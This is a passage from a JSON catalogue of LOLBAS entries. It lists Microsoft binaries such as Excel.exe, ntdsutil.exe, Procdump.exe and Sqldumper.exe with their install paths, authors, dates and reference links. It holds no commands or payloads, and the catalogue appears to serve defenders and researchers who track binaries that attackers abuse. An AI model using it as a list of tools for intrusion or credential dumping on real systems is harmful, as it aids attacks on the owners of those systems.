SDKs\\Windows\\<version>\\Bin\\ECMangen.exe","C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\Bin\\x64\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\<version>\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\ClientAccess\\Bin\\ECMangen.exe","C:\\ExchangeServer\\Bin\\ECMangen.exe"],"author":"Avihay Eldad","created":"2024-04-30T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ECMangen/"],"count":1},{"id":"lolbas:excel-exe","name":"Excel.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe"],"author":"Reegun J (OCBC Bank)","created":"2019-07-19T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/"],"count":1},{"id":"lolbas:fsi-exe","name":"Fsi.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\dotnet\\sdk\\<version>\\FSharp\\fsi.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsi.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Nick Tyrer @NickTyrer","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/"],"count":2},{"id":"lolbas:fsianycpu-exe","name":"FsiAnyCpu.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsianycpu.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Nick Tyrer @NickTyrer","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/"],"count":2},{"id":"lolbas:intellitrace-exe","name":"IntelliTrace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe"],"author":"Avihay Eldad","created":"2025-09-21T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/IntelliTrace/"],"count":1},{"id":"lolbas:logger-exe","name":"Logger.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x64\\logger.exe"],"author":"Avihay Eldad","created":"2025-07-13T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Logger/"],"count":3},{"id":"lolbas:mftrace-exe","name":"Mftrace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x64\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x64\\mftrace.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["fabrizio @0rbz_"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/"],"count":1},{"id":"lolbas:microsoft-nodejstools-pressanykey-exe","name":"Microsoft.NodejsTools.PressAnyKey.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey/"],"count":1},{"id":"lolbas:mpiexec-exe","name":"Mpiexec.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft MPI\\Bin\\mpiexec.exe","C:\\Program Files (x86)\\Microsoft MPI\\Bin\\mpiexec.exe"],"author":"Avihay Eldad","created":"2025-09-25T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mpiexec/"],"count":1},{"id":"lolbas:msaccess-exe","name":"MSAccess.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSAccess.exe"],"author":"Nir Chako","created":"2023-04-30T00:00:00.000Z","contributors":["Nir Chako @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MSAccess/"],"count":1},{"id":"lolbas:mscopilot-exe","name":"Mscopilot.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot.exe"],"author":"4n4s4zi","created":"2026-04-14T00:00:00.000Z","contributors":["4n4s4zi @4n4s4zi"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot/"],"count":1},{"id":"lolbas:mscopilot-proxy-exe","name":"Mscopilot_proxy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot_proxy.exe"],"author":"4n4s4zi","created":"2026-04-14T00:00:00.000Z","contributors":["4n4s4zi @4n4s4zi"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot_proxy/"],"count":1},{"id":"lolbas:msdeploy-exe","name":"Msdeploy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken","Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"],"count":3},{"id":"lolbas:msohtmed-exe","name":"MsoHtmEd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe"],"author":"Nir Chako","created":"2022-07-24T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtmEd/"],"count":1},{"id":"lolbas:mspub-exe","name":"Mspub.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSPUB.exe"],"author":"Nir Chako","created":"2022-08-02T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/"],"count":1},{"id":"lolbas:msxsl-exe","name":"msxsl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Ronnie Salomonsen @r0ns3n"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"],"count":6},{"id":"lolbas:nmcap-exe","name":"Nmcap.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Network Monitor 3\\nmcap.exe","C:\\Program Files (x86)\\Microsoft Network Monitor 3\\nmcap.exe"],"author":"Avihay Eldad","created":"2025-09-16T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Nmcap/"],"count":1},{"id":"lolbas:ntdsutil-exe","name":"ntdsutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\ntdsutil.exe"],"author":"Tony Lambert","created":"2020-01-10T00:00:00.000Z","contributors":["Sean Metcalf @PyroTek3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ntdsutil/"],"count":1},{"id":"lolbas:ntsd-exe","name":"Ntsd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\ntsd.exe"],"author":"Avihay Eldad","created":"2025-07-16T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ntsd/"],"count":1},{"id":"lolbas:openconsole-exe","name":"OpenConsole.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os86\\OpenConsole.exe","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_1.18.10301.0_x64__8wekyb3d8bbwe\\OpenConsole.exe"],"author":"Nasreddine Bencherchali","created":"2022-06-17T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/OpenConsole/"],"count":1},{"id":"lolbas:outlook-exe","name":"Outlook.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe"],"author":"Nir Chako","created":"2022-11-08T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Outlook/"],"count":1},{"id":"lolbas:pixtool-exe","name":"Pixtool.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft PIX\\pixtool.exe","C:\\Program Files (x86)\\Microsoft PIX\\pixtool.exe"],"author":"Avihay Eldad","created":"2025-09-21T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Pixtool/"],"count":1},{"id":"lolbas:powerpnt-exe","name":"Powerpnt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe"],"author":"Reegun J (OCBC Bank)","created":"2019-07-19T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/"],"count":1},{"id":"lolbas:procdump-exe","name":"Procdump.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":["Procdump64.exe"],"fullPath":["no default"],"author":"Alfie Champion (@ajpc500)","created":"2020-10-14T00:00:00.000Z","contributors":["Alfie Champion @ajpc500"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/"],"count":2},{"id":"lolbas:protocolhandler-exe","name":"ProtocolHandler.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office15\\ProtocolHandler.exe"],"author":"Nir Chako","created":"2022-07-24T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/"],"count":1},{"id":"lolbas:rcsi-exe","name":"rcsi.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/rcsi/"],"count":2},{"id":"lolbas:remote-exe","name":"Remote.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"],"author":"mr.d0x","created":"2021-06-01T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"],"count":3},{"id":"lolbas:sqldumper-exe","name":"Sqldumper.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\SQLDumper.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\vfs\\ProgramFilesX86\\Microsoft Analysis\\AS OLEDB\\140\\SQLDumper.exe","C:\\Program Files\\Microsoft Power BI Desktop\\bin\\SqlDumper.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Luis Rocha @countuponsec"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/"],"count":2},{"id":"lolbas:sqlps-exe","name":"Sqlps.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\100\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\110\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\150\\Tools\\Binn\\SQLPS.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Bryon @bryon_","Manny @ManuelBerrueta"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/"],"count":1},{"id":"lolbas:sqltoolsps-exe","name":"SQLToolsPS.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/SQLToolsPS/"],"count":1},{"id":"lolbas:squirrel-exe","name":"Squirrel.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"author":"Reegun J (OCBC Bank) - @reegun21","created":"2019-06-26T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21","Adam @Hexacorn"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"],"count":5},{"id":"lolbas:te-exe","name":"te.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Giuseppe N3mes1s @gN3mes1s","Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/te/"],"count":2},{"id":"lolbas:teams-exe","name":"Teams.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"],"author":"Andrew Kisliakov","created":"2022-01-17T00:00:00.000Z","contributors":["Andrew Kisliakov","mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"],"count":3},{"id":"lolbas:testwindowremoteagent-exe","name":"TestWindowRemoteAgent.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\RemoteAgent\\TestWindowRemoteAgent.exe"],"author":"Onat Uzunyayla","created":"2023-08-21T00:00:00.000Z","contributors":["Onat Uzunyayla"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/TestWindowRemoteAgent/"],"count":1},{"id":"lolbas:tracker-exe","name":"Tracker.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subTee"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"],"count":2},{"id":"lolbas:update-exe","name":"Update.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"author":"Oddvar Moe","created":"2019-06-26T00:00:00.000Z","contributors":["Reegun Richard Jayapaul (SpiderLabs, Trustwave) @reegun21","Mr.Un1k0d3r @MrUn1k0d3r","Adam @Hexacorn","Jesus Galvez"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"count":13},{"id":"lolbas:vsdiagnostics-exe","name":"VSDiagnostics.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe"],"author":"Bobby Cooke","created":"2023-07-12T00:00:00.000Z","contributors":["Bobby Cooke @0xBoku"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/"],"count":2},{"id":"lolbas:vsiisexelauncher-exe","name":"VSIISExeLauncher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\Extensions\\Microsoft\\Web Tools\\ProjectSystem\\VSIISExeLauncher.exe"],"author":"timwhite","created":"2021-09-24T00:00:00.000Z","contributors":["timwhite"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/"],"count":1},{"id":"lolbas:visio-exe","name":"Visio.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio.exe"],"author":"Avihay Eldad","created":"2024-02-15T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Visio/"],"count":1},{"id":"lolbas:visualuiaverifynative-exe","name":"VisualUiaVerifyNative.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\arm64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\UIAVerify\\VisualUiaVerifyNative.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Lee Christensen @tifkin","Jimmy 